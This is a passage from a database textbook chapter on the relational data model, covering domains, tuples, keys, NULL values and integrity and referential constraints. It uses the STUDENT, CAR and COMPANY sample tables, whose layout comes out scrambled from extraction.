ber of commercial systems. Current popular relational DBMSs (RDBMSs) include
DB2 and Informix Dynamic Server (from IBM), Oracle and Rdb (from Oracle),
Sybase DBMS (from Sybase) and SQLServer and Access (from Microsoft). In addi-
tion, several open source systems, such as MySQL and PostgreSQL, are available.

The relational model is extremely important. Of the languages associated with it,
the SQL query language is the standard for commercial relational DBMSs. The rela-
tional algebra and the relational calculus are two formal languages associated with
the relational model. The relational calculus is considered to be the basis for the
SQL language, and the relational algebra is used in the internals of many database
implementations for query processing and optimization.

From Chapter 3 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and
Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison-
Wesley. All rights reserved.

55

The Relational Data Model and Relational Database Constraints

Other aspects of the relational model are data structures relating to the constructs
of the ER and EER models and algorithms for designing a relational database
schema by mapping a conceptual schema in the ER or EER model into a relational
representation. These mappings are incorporated into many database design and
CASE1 tools. There are specific programming techniques used to access database
systems and connect to relational databases via ODBC and JDBC standard proto-
cols. Then there is Web database programming. Another aspect of the relational
model is the formal constraints of functional and multivalued dependencies; these
dependencies are used to develop a relational database design theory based on the
concept known as normalization.

Data models that preceded the relational model include the hierarchical and net-
work models. They were proposed in the 1960s and were implemented in early
DBMSs during the late 1960s and early 1970s. Because of their historical impor-
tance and the existing user base for these DBMSs, we have included a summary of
the highlights of these models in Appendices D and E, which are available on this
book’s Companion Website at http://www.aw.com/elmasri. These models and sys-
tems are now referred to as legacy database systems.

In this chapter, we concentrate on describing the basic principles of the relational
model of data. We begin by defining the modeling concepts and notation of the
relational model in Section 1. Section 2 is devoted to a discussion of relational con-
straints that are considered an important part of the relational model and are auto-
matically enforced in most relational DBMSs. Section 3 defines the update
operations of the relational model, discusses how violations of integrity constraints
are handled, and introduces the concept of a transaction. Section 4 summarizes the
chapter.

1 Relational Model Concepts
The relational model represents the database as a collection of relations. Informally,
each relation resembles a table of values or, to some extent, a flat file of records. It is
called a flat file because each record has a simple linear or flat structure. However,
there are important differences between relations and files, as we shall soon see.

When a relation is thought of as a table of values, each row in the table represents
a collection of related data values. A row represents a fact that typically corresponds
to a real-world entity or relationship. The table name and column names are
used to help to interpret the meaning of the values in each row. For example, imag-
ine a table called STUDENT where each row represents facts about a particular

1CASE stands for computer-aided software engineering.

56

The Relational Data Model and Relational Database Constraints

student entity. The column names—Name, Student_number, Class, and Major—spec-
ify how to interpret the data values in each row, based on the column each value is
in. All values in a column are of the same data type.

In the formal relational model terminology, a row is called a tuple, a column header
is called an attribute, and the table is called a relation. The data type describing the
types of values that can appear in each column is represented by a domain of possi-
ble values. We now define these terms—domain, tuple, attribute, and relation—
formally.

1.1 Domains, Attributes, Tuples, and Relations
A domain D is a set of atomic values. By atomic we mean that each value in the
domain is indivisible as far as the formal relational model is concerned. A common
method of specifying a domain is to specify a data type from which the data values
forming the domain are drawn. It is also useful to specify a name for the domain, to
help in interpreting its values. Some examples of domains follow:

■ Usa_phone_numbers. The set of ten-digit phone numbers valid in the United
States.

■ Local_phone_numbers. The set of seven-digit phone numbers valid within a
particular area code in the United States. The use of local phone numbers is
quickly becoming obsolete, being replaced by standard ten-digit numbers.

■ Social_security_numbers. The set of valid nine-digit Social Security numbers.
(This is a unique identifier assigned to each person in the United States for
employment, tax, and benefits purposes.)

■ Names: The set of character strings that represent names of persons.

■ Grade_point_averages. Possible values of computed grade point averages;
each must be a real (floating-point) number between 0 and 4.

■ Employee_ages. Possible ages of employees in a company; each must be an
integer value between 15 and 80.

■ Academic_department_names. The set of academic department names in a
university, such as Computer Science, Economics, and Physics.

■ Academic_department_codes. The set of academic department codes, such as
‘CS’, ‘ECON’, and ‘PHYS’.

The preceding are called logical definitions of domains. A data type or format is
also specified for each domain. For example, the data type for the domain
Usa_phone_numbers can be declared as a character string of the form (ddd)ddd-
dddd, where each d is a numeric (decimal) digit and the first three digits form a
valid telephone area code. The data type for Employee_ages is an integer number
between 15 and 80. For Academic_department_names, the data type is the set of all
character strings that represent valid department names. A domain is thus given a
name, data type, and format. Additional information for interpreting the values of a
domain can also be given; for example, a numeric domain such as Person_weights
should have the units of measurement, such as pounds or kilograms.

57

The Relational Data Model and Relational Database Constraints

A relation schema2 R, denoted by R(A1, A
2, …, An), is made up of a relation name R

and a list of attributes, A1, A2, …, An. Each attribute Ai is the name of a role played
by some domain D in the relation schema R. D is called the domain of Ai and is
denoted by dom(Ai). A relation schema is used to describe a relation; R is called the
name of this relation. The degree (or arity) of a relation is the number of attributes
n of its relation schema.

A relation of degree seven, which stores information about university students,
would contain seven attributes describing each student. as follows:

STUDENT(Name, Ssn, Home_phone, Address, Office_phone, Age, Gpa)

Using the data type of each attribute, the definition is sometimes written as:

STUDENT(Name: string, Ssn: string, Home_phone: string, Address: string,
Office_phone: string, Age: integer, Gpa: real)

For this relation schema, STUDENT is the name of the relation, which has seven
attributes. In the preceding definition, we showed assignment of generic types such
as string or integer to the attributes. More precisely, we can specify the following
previously defined domains for some of the attributes of the STUDENT relation:
dom(Name) = Names; dom(Ssn) = Social_security_numbers; dom(HomePhone) =
USA_phone_numbers3, dom(Office_phone) = USA_phone_numbers, and dom(Gpa) =
Grade_point_averages. It is also possible to refer to attributes of a relation schema by
their position within the relation; thus, the second attribute of the STUDENT rela-
tion is Ssn, whereas the fourth attribute is Address.

A relation (or relation state)4 r of the relation schema R(A1, A2, …, An), also
denoted by r(R), is a set of n-tuples r = {t1, t2, …, tm}. Each n-tuple t is an ordered list
of n values t =, where each value vi, 1 ≤ i ≤ n, is an element of dom
(Ai) or is a special NULL value. (NULL values are discussed further below and in
Section 1.2.) The ith value in tuple t, which corresponds to the attribute Ai, is
referred to as t[Ai] or t.Ai (or t[i] if we use the positional notation). The terms
relation intension for the schema R and relation extension for a relation state r(R)
are also commonly used.

Figure 1 shows an example of a STUDENT relation, which corresponds to the
STUDENT schema just specified. Each tuple in the relation represents a particular
student entity (or object). We display the relation as a table, where each tuple is
shown as a row and each attribute corresponds to a column header indicating a role
or interpretation of the values in that column. NULL values represent attributes
whose values are unknown or do not exist for some individual STUDENT tuple.

2A relation schema is sometimes called a relation scheme.
3With the large increase in phone numbers caused by the proliferation of mobile phones, most metropoli-
tan areas in the U.S. now have multiple area codes, so seven-digit local dialing has been discontinued in
most areas. We changed this domain to Usa_phone_numbers instead of Local_phone_numbers which
would be a more general choice. This illustrates how database requirements can change over time.
4This has also been called a relation instance. We will not use this term because instance is also used
to refer to a single tuple or row.

58

The Relational Data Model and Relational Database Constraints

Relation Name

Tuples

STUDENT

Name

Benjamin Bayer

Chung-cha Kim

Dick Davidson

Rohan Panchal

Barbara Benson

Ssn

305-61-2435

381-62-1245

422-11-2320

489-22-1100

533-69-1238

Home_phone

(817)373-1616

(817)375-4409

NULL

(817)376-9821

(817)839-8461

Address

2918 Bluebonnet Lane

125 Kirby Road

3452 Elgin Road

265 Lark Lane

7384 Fontana Lane

Office_phone

NULL

NULL

(817)749-1253

(817)749-6492

NULL

Age

19

18

25

28

19

3.21

2.89

3.53

3.93

3.25

Gpa

Attributes

Figure 1
The attributes and tuples of a relation STUDENT.

The earlier definition of a relation can be restated more formally using set theory
concepts as follows. A relation (or relation state) r(R) is a mathematical relation of
degree n on the domains dom(A1), dom(A2), …, dom(An), which is a subset of the
Cartesian product (denoted by ×) of the domains that define R:

r(R) ⊆ (dom(A1) × dom(A2) × … × dom(An))

The Cartesian product specifies all possible combinations of values from the under-
lying domains. Hence, if we denote the total number of values, or cardinality, in a
domain D by |D| (assuming that all domains are finite), the total number of tuples
in the Cartesian product is

|dom(A1)| × |dom(A2)| × … × |dom(An)|

This product of cardinalities of all domains represents the total number of possible
instances or tuples that can ever exist in any relation state r(R). Of all these possible
combinations, a relation state at a given time—the current relation state—reflects
only the valid tuples that represent a particular state of the real world. In general, as
the state of the real world changes, so does the relation state, by being transformed
into another relation state. However, the schema R is relatively static and changes
very infrequently—for example, as a result of adding an attribute to represent new
information that was not originally stored in the relation.

It is possible for several attributes to have the same domain. The attribute names
indicate different roles, or interpretations, for the domain. For example, in the
STUDENT relation, the same domain USA_phone_numbers plays the role of
Home_phone, referring to the home phone of a student, and the role of Office_phone,
referring to the office phone of the student. A third possible attribute (not shown)
with the same domain could be Mobile_phone.

1.2 Characteristics of Relations
The earlier definition of relations implies certain characteristics that make a relation
different from a file or a table. We now discuss some of these characteristics.

59

The Relational Data Model and Relational Database Constraints

Dick Davidson

Barbara Benson

Rohan Panchal

Chung-cha Kim

422-11-2320

533-69-1238

489-22-1100

381-62-1245

NULL

(817)839-8461

(817)376-9821

(817)375-4409

3452 Elgin Road

7384 Fontana Lane

265 Lark Lane

125 Kirby Road

(817)749-1253

NULL

(817)749-6492

NULL

25

19

28

18

3.53

3.25

3.93

2.89

Benjamin Bayer 305-61-2435 (817)373-1616 2918 Bluebonnet Lane NULL 19 3.21

STUDENT
Name Ssn Home_phone Address Office_phone Age Gpa

Figure 2
The relation STUDENT from Figure 1 with a different order of tuples.

Ordering of Tuples in a Relation. A relation is defined as a set of tuples.
Mathematically, elements of a set have no order among them; hence, tuples in a rela-
tion do not have any particular order. In other words, a relation is not sensitive to
the ordering of tuples. However, in a file, records are physically stored on disk (or in
memory), so there always is an order among the records. This ordering indicates
first, second, ith, and last records in the file. Similarly, when we display a relation as
a table, the rows are displayed in a certain order.

Tuple ordering is not part of a relation definition because a relation attempts to rep-
resent facts at a logical or abstract level. Many tuple orders can be specified on the
same relation. For example, tuples in the STUDENT relation in Figure 1 could be
ordered by values of Name, Ssn, Age, or some other attribute. The definition of a rela-
tion does not specify any order: There is no preference for one ordering over another.
Hence, the relation displayed in Figure 2 is considered identical to the one shown in
Figure 1. When a relation is implemented as a file or displayed as a table, a particular
ordering may be specified on the records of the file or the rows of the table.

Ordering of Values within a Tuple and an Alternative Definition of a
Relation. According to the preceding definition of a relation, an n-tuple is an
ordered list of n values, so the ordering of values in a tuple—and hence of attributes
in a relation schema—is important. However, at a more abstract level, the order of
attributes and their values is not that important as long as the correspondence
between attributes and values is maintained.

An alternative definition of a relation can be given, making the ordering of values
in a tuple unnecessary. In this definition, a relation schema R = {A1, A2, …, An} is a
set of attributes (instead of a list), and a relation state r(R) is a finite set of mappings
r = {t1, t2, …, tm}, where each tuple ti is a mapping from R to D, and D is the union
(denoted by ∪) of the attribute domains; that is, D = dom(A1) ∪ dom(A2) ∪ … ∪
dom(An). In this definition, t[Ai] must be in dom(Ai) for 1 ≤ i ≤ n for each mapping
t in r. Each mapping ti is called a tuple.

According to this definition of tuple as a mapping, a tuple can be considered as a set
of (, ) pairs, where each pair gives the value of the mapping
from an attribute Ai to a value vi from dom(Ai). The ordering of attributes is not

60

The Relational Data Model and Relational Database Constraints

t = < (Name, Dick Davidson),(Ssn, 422-11-2320),(Home_phone, NULL),(Address, 3452 Elgin Road), (Office_phone, (817)749-1253),(Age, 25),(Gpa, 3.53)>

t = < (Address, 3452 Elgin Road),(Name, Dick Davidson),(Ssn, 422-11-2320),(Age, 25), (Office_phone, (817)749-1253),(Gpa, 3.53),(Home_phone, NULL)>

Figure 3
Two identical tuples when the order of attributes and values is not part of relation definition.

important, because the attribute name appears with its value. By this definition, the
two tuples shown in Figure 3 are identical. This makes sense at an abstract level,
since there really is no reason to prefer having one attribute value appear before
another in a tuple.

When a relation is implemented as a file, the attributes are physically ordered as
fields within a record. We will generally use the first definition of relation, where
the attributes and the values within tuples are ordered, because it simplifies much of
the notation. However, the alternative definition given here is more general.5

Values and NULLs in the Tuples. Each value in a tuple is an atomic value; that
is, it is not divisible into components within the framework of the basic relational
model. Hence, composite and multivalued attributes are not allowed. This model is
sometimes called the flat relational model. Much of the theory behind the rela-
tional model was developed with this assumption in mind, which is called the first
normal form assumption.6 Hence, multivalued attributes must be represented by
separate relations, and composite attributes are represented only by their simple
component attributes in the basic relational model.7

An important concept is that of NULL values, which are used to represent the values
of attributes that may be unknown or may not apply to a tuple. A special value,
called NULL, is used in these cases. For example, in Figure 1, some STUDENT tuples
have NULL for their office phones because they do not have an office (that is, office
phone does not apply to these students). Another student has a NULL for home
phone, presumably because either he does not have a home phone or he has one but
we do not know it (value is unknown). In general, we can have several meanings for
NULL values, such as value unknown, value exists but is not available, or attribute
does not apply to this tuple (also known as value undefined). An example of the last
type of NULL will occur if we add an attribute Visa_status to the STUDENT relation

5The alternative definition of relation is useful when discussing query processing and optimization.
6This assumption is not detailed here.
7Extensions of the relational model remove these restrictions. For example, object-relational systems
allow complex-structured attributes, as do the non-first normal form or nested relational models.

61

The Relational Data Model and Relational Database Constraints

that applies only to tuples representing foreign students. It is possible to devise dif-
ferent codes for different meanings of NULL values. Incorporating different types of
NULL values into relational model operations has proven difficult and is outside the
scope of our presentation.

The exact meaning of a NULL value governs how it fares during arithmetic aggrega-
tions or comparisons with other values. For example, a comparison of two NULL
values leads to ambiguities—if both Customer A and B have NULL addresses, it does
not mean they have the same address. During database design, it is best to avoid
NULL values as much as possible.

Interpretation (Meaning) of a Relation. The relation schema can be interpreted
as a declaration or a type of assertion. For example, the schema of the STUDENT
relation of Figure 1 asserts that, in general, a student entity has a Name, Ssn,
Home_phone, Address, Office_phone, Age, and Gpa. Each tuple in the relation can
then be interpreted as a fact or a particular instance of the assertion. For example,
the first tuple in Figure 1 asserts the fact that there is a STUDENT whose Name is
Benjamin Bayer, Ssn is 305-61-2435, Age is 19, and so on.

Notice that some relations may represent facts about entities, whereas other relations
may represent facts about relationships. For example, a relation schema MAJORS
(Student_ssn, Department_code) asserts that students major in academic disciplines. A
tuple in this relation relates a student to his or her major discipline. Hence, the rela-
tional model represents facts about both entities and relationships uniformly as rela-
tions. This sometimes compromises understandability because one has to guess
whether a relation represents an entity type or a relationship type. Mapping proce-
dures show how different constructs of the ER (Entity-Relationship) and EER
(Enhanced ER) conceptual data models get converted to relations.

An alternative interpretation of a relation schema is as a predicate; in this case, the
values in each tuple are interpreted as values that satisfy the predicate. For example,
the predicate STUDENT (Name, Ssn, …) is true for the five tuples in relation
STUDENT of Figure 1. These tuples represent five different propositions or facts in
the real world. This interpretation is quite useful in the context of logical program-
ming languages, such as Prolog, because it allows the relational model to be used
within these languages. An assumption called the closed world assumption states
that the only true facts in the universe are those present within the extension (state)
of the relation(s). Any other combination of values makes the predicate false.

1.3 Relational Model Notation
We will use the following notation in our presentation:

■ A relation schema R of degree n is denoted by R(A1, A2, …, An).

■ The uppercase letters Q, R, S denote relation names.

■ The lowercase letters q, r, s denote relation states.

62

The Relational Data Model and Relational Database Constraints

■ The letters t, u, v denote tuples.

■ In general, the name of a relation schema such as STUDENT also indicates the
current set of tuples in that relation—the current relation state—whereas
STUDENT(Name, Ssn, …) refers only to the relation schema.

■ An attribute A can be qualified with the relation name R to which it belongs
by using the dot notation R.A—for example, STUDENT.Name or
STUDENT.Age. This is because the same name may be used for two attributes
in different relations. However, all attribute names in a particular relation
must be distinct.

■ An n-tuple t in a relation r(R) is denoted by t = , where vi is the
value corresponding to attribute Ai. The following notation refers to
component values of tuples:

■ Both t[Ai] and t.Ai (and sometimes t[i]) refer to the value vi in t for attribute
Ai.

■ Both t[Au, Aw, …, Az] and t.(Au, Aw, …, Az), where Au, Aw, …, Az is a list of
attributes from R, refer to the subtuple of values from t cor-
responding to the attributes specified in the list.

As an example, consider the tuple t = <‘Barbara Benson’, ‘533-69-1238’, ‘(817)839- 8461’, ‘7384 Fontana Lane’, NULL, 19, 3.25> from the STUDENT relation in Figure 1;
we have t[Name] = <‘Barbara Benson’>, and t[Ssn, Gpa, Age] = <‘533-69-1238’, 3.25, 19>.

2 Relational Model Constraints
and Relational Database Schemas

So far, we have discussed the characteristics of single relations. In a relational data-
base, there will typically be many relations, and the tuples in those relations are usu-
ally related in various ways. The state of the whole database will correspond to the
states of all its relations at a particular point in time. There are generally many
restrictions or constraints on the actual values in a database state. These constraints
are derived from the rules in the miniworld that the database represents.

In this section, we discuss the various restrictions on data that can be specified on a
relational database in the form of constraints. Constraints on databases can gener-
ally be divided into three main categories:

1. Constraints that are inherent in the data model. We call these inherent
model-based constraints or implicit constraints.

2. Constraints that can be directly expressed in schemas of the data model, typ-
ically by specifying them in the DDL (data definition language). We call
these schema-based constraints or explicit constraints.

63

The Relational Data Model and Relational Database Constraints

3. Constraints that cannot be directly expressed in the schemas of the data
model, and hence must be expressed and enforced by the application pro-
grams. We call these application-based or semantic constraints or business
rules.

The characteristics of relations that we discussed in Section 1.2 are the inherent
constraints of the relational model and belong to the first category. For example, the
constraint that a relation cannot have duplicate tuples is an inherent constraint. The
constraints we discuss in this section are of the second category, namely, constraints
that can be expressed in the schema of the relational model via the DDL.
Constraints in the third category are more general, relate to the meaning as well as
behavior of attributes, and are difficult to express and enforce within the data
model, so they are usually checked within the application programs that perform
database updates.

Another important category of constraints is data dependencies, which include
functional dependencies and multivalued dependencies. They are used mainly for
testing the “goodness” of the design of a relational database and are utilized in a
process called normalization.

The schema-based constraints include domain constraints, key constraints, con-
straints on NULLs, entity integrity constraints, and referential integrity constraints.

2.1 Domain Constraints
Domain constraints specify that within each tuple, the value of each attribute A
must be an atomic value from the domain dom(A). We have already discussed the
ways in which domains can be specified in Section 1.1. The data types associated
with domains typically include standard numeric data types for integers (such as
short integer, integer, and long integer) and real numbers (float and double-
precision float). Characters, Booleans, fixed-length strings, and variable-length
strings are also available, as are date, time, timestamp, and money, or other special
data types. Other possible domains may be described by a subrange of values from a
data type or as an enumerated data type in which all possible values are explicitly
listed.

2.2 Key Constraints and Constraints on NULL Values
In the formal relational model, a relation is defined as a set of tuples. By definition,
all elements of a set are distinct; hence, all tuples in a relation must also be distinct.
This means that no two tuples can have the same combination of values for all their
attributes. Usually, there are other subsets of attributes of a relation schema R with
the property that no two tuples in any relation state r of R should have the same
combination of values for these attributes. Suppose that we denote one such subset
of attributes by SK; then for any two distinct tuples t1 and t2 in a relation state r of R,
we have the constraint that:

t1[SK] ≠ t2[SK]

64

The Relational Data Model and Relational Database Constraints

Any such set of attributes SK is called a superkey of the relation schema R. A
superkey SK specifies a uniqueness constraint that no two distinct tuples in any state
r of R can have the same value for SK. Every relation has at least one default
superkey—the set of all its attributes. A superkey can have redundant attributes,
however, so a more useful concept is that of a key, which has no redundancy. A key
K of a relation schema R is a superkey of R with the additional property that remov-
ing any attribute A from K leaves a set of attributes K� that is not a superkey of R any
more. Hence, a key satisfies two properties:

1. Two distinct tuples in any state of the relation cannot have identical values
for (all) the attributes in the key. This first property also applies to a
superkey.

2. It is a minimal superkey—that is, a superkey from which we cannot remove
any attributes and still have the uniqueness constraint in condition 1 hold.
This property is not required by a superkey.

Whereas the first property applies to both keys and superkeys, the second property
is required only for keys. Hence, a key is also a superkey but not vice versa. Consider
the STUDENT relation of Figure 1. The attribute set {Ssn} is a key of STUDENT
because no two student tuples can have the same value for Ssn.8 Any set of attrib-
utes that includes Ssn—for example, {Ssn, Name, Age}—is a superkey. However, the
superkey {Ssn, Name, Age} is not a key of STUDENT because removing Name or Age
or both from the set still leaves us with a superkey. In general, any superkey formed
from a single attribute is also a key. A key with multiple attributes must require all
its attributes together to have the uniqueness property.

The value of a key attribute can be used to identify uniquely each tuple in the rela-
tion. For example, the Ssn value 305-61-2435 identifies uniquely the tuple corre-
sponding to Benjamin Bayer in the STUDENT relation. Notice that a set of attributes
constituting a key is a property of the relation schema; it is a constraint that should
hold on every valid relation state of the schema. A key is determined from the mean-
ing of the attributes, and the property is time-invariant: It must continue to hold
when we insert new tuples in the relation. For example, we cannot and should not
designate the Name attribute of the STUDENT relation in Figure 1 as a key because it
is possible that two students with identical names will exist at some point in a valid
state.9

In general, a relation schema may have more than one key. In this case, each of the
keys is called a candidate key. For example, the CAR relation in Figure 4 has two
candidate keys: License_number and Engine_serial_number. It is common to designate
one of the candidate keys as the primary key of the relation. This is the candidate
key whose values are used to identify tuples in the relation. We use the convention
that the attributes that form the primary key of a relation schema are underlined, as
shown in Figure 4. Notice that when a relation schema has several candidate keys,

8Note that Ssn is also a superkey.
9Names are sometimes used as keys, but then some artifact—such as appending an ordinal number—
must be used to distinguish between identical names.

65

The Relational Data Model and Relational Database Constraints

CAR

License_number Engine_serial_number Make Model Year

Texas ABC-739

Florida TVP-347

New York MPO-22

California 432-TFY

California RSK-629

Texas RSK-629

A69352

B43696

X83554

C43742

Y82935

U028365

Ford

Oldsmobile

Oldsmobile

Mercedes

Toyota

Jaguar

Mustang

Cutlass

Delta

190-D

Camry

XJS

02

05

01

99

04

04

Figure 4
The CAR relation, with
two candidate keys:
License_number and
Engine_serial_number.

the choice of one to become the primary key is somewhat arbitrary; however, it is
usually better to choose a primary key with a single attribute or a small number of
attributes. The other candidate keys are designated as unique keys, and are not
underlined.

Another constraint on attributes specifies whether NULL values are or are not per-
mitted. For example, if every STUDENT tuple must have a valid, non-NULL value for
the Name attribute, then Name of STUDENT is constrained to be NOT NULL.

2.3 Relational Databases and Relational
Database Schemas

The definitions and constraints we have discussed so far apply to single relations
and their attributes. A relational database usually contains many relations, with
tuples in relations that are related in various ways. In this section we define a rela-
tional database and a relational database schema.

A relational database schema S is a set of relation schemas S = {R1, R2, …, Rm} and
a set of integrity constraints IC. A relational database state10 DB of S is a set of
relation states DB = {r1, r2, …, rm} such that each ri is a state of Ri and such that the
ri relation states satisfy the integrity constraints specified in IC. Figure 5 shows a
relational database schema that we call COMPANY = {EMPLOYEE, DEPARTMENT,
DEPT_LOCATIONS, PROJECT, WORKS_ON, DEPENDENT}. The underlined attrib-
utes represent primary keys. Figure 6 shows a relational database state corres-
ponding to the COMPANY schema. We will use this schema and database state in
this chapter for developing sample queries in different relational languages.

When we refer to a relational database, we implicitly include both its schema and its
current state. A database state that does not obey all the integrity constraints is
called an invalid state, and a state that satisfies all the constraints in the defined set
of integrity constraints IC is called a valid state.

10A relational database state is sometimes called a relational database instance. However, as we men-
tioned earlier, we will not use the term instance since it also applies to single tuples.

66

The Relational Data Model and Relational Database Constraints

DEPARTMENT

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

EMPLOYEE

DEPT_LOCATIONS

Dnumber Dlocation

PROJECT

Pname Pnumber Plocation Dnum

WORKS_ON

Essn Pno Hours

DEPENDENT

Essn Dependent_name Sex Bdate Relationship

Dname Dnumber Mgr_ssn Mgr_start_date

Figure 5
Schema diagram for the
COMPANY relational
database schema.

In Figure 5, the Dnumber attribute in both DEPARTMENT and DEPT_LOCATIONS
stands for the same real-world concept—the number given to a department. That
same concept is called Dno in EMPLOYEE and Dnum in PROJECT. Attributes that
represent the same real-world concept may or may not have identical names in dif-
ferent relations. Alternatively, attributes that represent different concepts may have
the same name in different relations. For example, we could have used the attribute
name Name for both Pname of PROJECT and Dname of DEPARTMENT; in this case,
we would have two attributes that share the same name but represent different real-
world concepts—project names and department names.

In some early versions of the relational model, an assumption was made that the
same real-world concept, when represented by an attribute, would have identical
attribute names in all relations. This creates problems when the same real-world
concept is used in different roles (meanings) in the same relation. For example, the
concept of Social Security number appears twice in the EMPLOYEE relation of
Figure 5: once in the role of the employee’s SSN, and once in the role of the supervi-
sor’s SSN. We are required to give them distinct attribute names—Ssn and
Super_ssn, respectively—because they appear in the same relation and in order to
distinguish their meaning.

Each relational DBMS must have a data definition language (DDL) for defining a
relational database schema. Current relational DBMSs are mostly using SQL for this
purpose.

67

DEPT_LOCATIONS

Dnumber

Houston

Stafford

Bellaire

Sugarland

Dlocation

DEPARTMENT

Dname

Research

Administration

Headquarters 1

5

4

888665555

333445555

987654321

1981-06-19

1988-05-22

1995-01-01

Dnumber Mgr_ssn Mgr_start_date

WORKS_ON

Essn

123456789

123456789

666884444

453453453

453453453

333445555

333445555

333445555

333445555

999887777

999887777

987987987

987987987

987654321

987654321

888665555

3

1

2

2

1

2

30

30

30

10

10

3

10

20

20

20

40.0

32.5

7.5

10.0

10.0

10.0

10.0

20.0

20.0

30.0

5.0

10.0

35.0

20.0

15.0

NULL

Pno Hours

PROJECT

Pname

ProductX

ProductY

ProductZ

Computerization

Reorganization

Newbenefits

3

1

2

30

10

20

5

5

5

4

4

1

Houston

Bellaire

Sugarland

Stafford

Stafford

Houston

Pnumber Plocation Dnum

DEPENDENT

333445555

333445555

333445555

987654321

123456789

123456789

123456789

Joy

Alice F

M

F

M

M

F

F

1986-04-05

1983-10-25

1958-05-03

1942-02-28

1988-01-04

1988-12-30

1967-05-05

Theodore

Alice

Elizabeth

Abner

Michael

Spouse

Daughter

Son

Daughter

Spouse

Spouse

Son

Dependent_name Sex Bdate Relationship

EMPLOYEE

Fname

John

Franklin

Jennifer

Alicia

Ramesh

Joyce

James

Ahmad

Narayan

English

Borg

Jabbar

666884444

453453453

888665555

987987987

F

F

M

M

M

M

M

F

4

4

5

5

4

1

5

5

25000

43000

30000

40000

25000

55000

38000

25000

987654321

888665555

333445555

888665555

987654321

NULL

333445555

333445555

Zelaya

Wallace

Smith

Wong

3321 Castle, Spring, TX

291 Berry, Bellaire, TX

731 Fondren, Houston, TX

638 Voss, Houston, TX

1968-01-19

1941-06-20

1965-01-09

1955-12-08

1969-03-29

1937-11-10

1962-09-15

1972-07-31

980 Dallas, Houston, TX

450 Stone, Houston, TX

975 Fire Oak, Humble, TX

5631 Rice, Houston, TX

999887777

987654321

123456789

333445555

Minit Lname Ssn Bdate Address Sex DnoSalary Super_ssn

B

T

J

S

K

A

V

E

Houston

1

4

5

5

Essn

5

Figure 6
One possible database state for the COMPANY relational database schema.

The Relational Data Model and Relational Database Constraints

68

Integrity constraints are specified on a database schema and are expected to hold on
every valid database state of that schema. In addition to domain, key, and NOT NULL
constraints, two other types of constraints are considered part of the relational
model: entity integrity and referential integrity.

2.4 Integrity, Referential Integrity,
and Foreign Keys

The entity integrity constraint states that no primary key value can be NULL. This
is because the primary key value is used to identify individual tuples in a relation.
Having NULL values for the primary key implies that we cannot identify some
tuples. For example, if two or more tuples had NULL for their primary keys, we may
not be able to distinguish them if we try to reference them from other relations.

Key constraints and entity integrity constraints are specified on individual relations.
The referential integrity constraint is specified between two relations and is used
to maintain the consistency among tuples in the two relations. Informally, the refer-
ential integrity constraint states that a tuple in one relation that refers to another
relation must refer to an existing tuple in that relation. For example, in Figure 6, the
attribute Dno of EMPLOYEE gives the department number for which each employee
works; hence, its value in every EMPLOYEE tuple must match the Dnumber value of
some tuple in the DEPARTMENT relation.

To define referential integrity more formally, first we define the concept of a foreign
key. The conditions for a foreign key, given below, specify a referential integrity con-
straint between the two relation schemas R1 and R2. A set of attributes FK in rela-
tion schema R1 is a foreign key of R1 that references relation R2 if it satisfies the
following rules:

1. The attributes in FK have the same domain(s) as the primary key attributes
PK of R2; the attributes FK are said to reference or refer to the relation R2.

2. A value of FK in a tuple t1 of the current state r1(R1) either occurs as a value
of PK for some tuple t2 in the current state r2(R2) or is NULL. In the former
case, we have t1[FK] = t2[PK], and we say that the tuple t1 references or
refers to the tuple t2.

In this definition, R1 is called the referencing relation and R2 is the referenced rela-
tion. If these two conditions hold, a referential integrity constraint from R1 to R2 is
said to hold. In a database of many relations, there are usually many referential
integrity constraints.

To specify these constraints, first we must have a clear understanding of the mean-
ing or role that each attribute or set of attributes plays in the various relation
schemas of the database. Referential integrity constraints typically arise from the
relationships among the entities represented by the relation schemas. For example,
consider the database shown in Figure 6. In the EMPLOYEE relation, the attribute
Dno refers to the department for which an employee works; hence, we designate Dno
to be a foreign key of EMPLOYEE referencing the DEPARTMENT relation. This means
that a value of Dno in any tuple t1 of the EMPLOYEE relation must match a value of

The Relational Data Model and Relational Database Constraints

69

The Relational Data Model and Relational Database Constraints

the primary key of DEPARTMENT—the Dnumber attribute—in some tuple t2 of the
DEPARTMENT relation, or the value of Dno can be NULL if the employee does not
belong to a department or will be assigned to a department later. For example, in
Figure 6 the tuple for employee ‘John Smith’ references the tuple for the ‘Research’
department, indicating that ‘John Smith’ works for this department.

Notice that a foreign key can refer to its own relation. For example, the attribute
Super_ssn in EMPLOYEE refers to the supervisor of an employee; this is another
employee, represented by a tuple in the EMPLOYEE relation. Hence, Super_ssn is a
foreign key that references the EMPLOYEE relation itself. In Figure 6 the tuple for
employee ‘John Smith’ references the tuple for employee ‘Franklin Wong,’ indicating
that ‘Franklin Wong’ is the supervisor of ‘John Smith.’

We can diagrammatically display referential integrity constraints by drawing a directed
arc from each foreign key to the relation it references. For clarity, the arrowhead may
point to the primary key of the referenced relation. Figure 7 shows the schema in
Figure 5 with the referential integrity constraints displayed in this manner.

All integrity constraints should be specified on the relational database schema (i.e.,
defined as part of its definition) if we want to enforce these constraints on the data-
base states. Hence, the DDL includes provisions for specifying the various types of
constraints so that the DBMS can automatically enforce them. Most relational
DBMSs support key, entity integrity, and referential integrity constraints. These
constraints are specified as a part of data definition in the DDL.

2.5 Other Types of Constraints
The preceding integrity constraints are included in the data definition language
because they occur in most database applications. However, they do not include a
large class of general constraints, sometimes called semantic integrity constraints,
which may have to be specified and enforced on a relational database. Examples of
such constraints are the salary of an employee should not exceed the salary of the
employee’s supervisor and the maximum number of hours an employee can work on all
projects per week is 56. Such constraints can be specified and enforced within the
application programs that update the database, or by using a general-purpose
constraint specification language. Mechanisms called triggers and assertions can
be used. In SQL, CREATE ASSERTION and CREATE TRIGGER statements can be
used for this purpose. It is more common to check for these types of constraints
within the application programs than to use constraint specification languages
because the latter are sometimes difficult and complex to use.

Another type of constraint is the functional dependency constraint, which establishes
a functional relationship among two sets of attributes X and Y. This constraint spec-
ifies that the value of X determines a unique value of Y in all states of a relation; it is
denoted as a functional dependency X → Y. We use functional depen-dencies and
other types of dependencies not detailed here as tools to analyze the quality of rela-
tional designs and to “normalize” relations to improve their quality.

70

The Relational Data Model and Relational Database Constraints

DEPARTMENT

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

EMPLOYEE
